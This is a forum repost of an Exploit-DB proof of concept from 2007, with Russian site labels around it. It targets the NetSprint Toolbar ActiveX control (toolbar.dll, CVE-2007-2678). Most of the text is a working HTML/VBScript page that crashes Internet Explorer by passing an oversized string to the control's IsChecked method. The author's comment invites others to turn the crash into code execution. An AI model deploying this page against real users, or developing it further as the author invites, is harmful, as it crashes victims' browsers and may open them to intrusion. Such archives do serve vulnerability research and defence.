Exploit NetSprint Toolbar - ActiveX 'toolbar.dll' Denial of Service (PoC)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
3790
Проверка EDB
  1. Пройдено
Автор
UMESH WANVE
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
cve-2007-2678
Дата публикации
2007-04-24
HTML:
<!--

  ===============================================================================================
                        NetSprint Toolbar ActiveX toolbar.dll DOS POC
                                            By Umesh Wanve 
  ==============================================================================================   
        
  Date :     24-04-2007
 
  Tested on: Windows 2000 SP4 Server English
             Windows 2000 SP4 Professional English
  
  Reference: https://www.securityfocus.com/bid/23530

  Vendor:    http://netsprint.pl/toolbar/install.html
         


  
  Desc: This is very interesting vulnerability. The function ischecked() takes URL as string parameter.
       But actually it is not handled by dll. When we don't give any parameter i.e. target.ischecked "" the 
       IE works fine. But when we supply data as parameter the IE crashes. Interestingly you can able to 
       see your data on the stack. But I am not able to overwrite any registers or SEH. So though our
       data is on the stack. Its hard to exploit. So only dos. 

       May be someone can get success in this. Let me know if u find.

  
  PS. This was written for educational purpose. Use it at your own risk.Author will be not be
      responsible for any damage.
 
  Always thanks to Metasploit and Stroke.

-->


<html>

<title>
 NetSprint Toolbar ActiveX toolbar.dll DOS POC - By Umesh Wanve
</title>


<body>
<OBJECT id="target" WIDTH=445 HEIGHT=40 classid="clsid:34F459B8-1D37-4FF2-9EFA-192D8E3ABA6F" > </OBJECT>

<script language="vbscript">


targetFile = "C:\WINNT\Downloaded Program Files\toolbar.dll"
prototype  = "Function IsChecked ( ByVal url As String ) As Long"
memberName = "IsChecked"
progid     = "SoftomateLib.SoftomateObj"
argCount   = 1

arg1=String(500, "A")

target.IsChecked arg1

</script>

</body>

</html>

# milw0rm.com [2007-04-24]
 
Источник
www.exploit-db.com

Похожие темы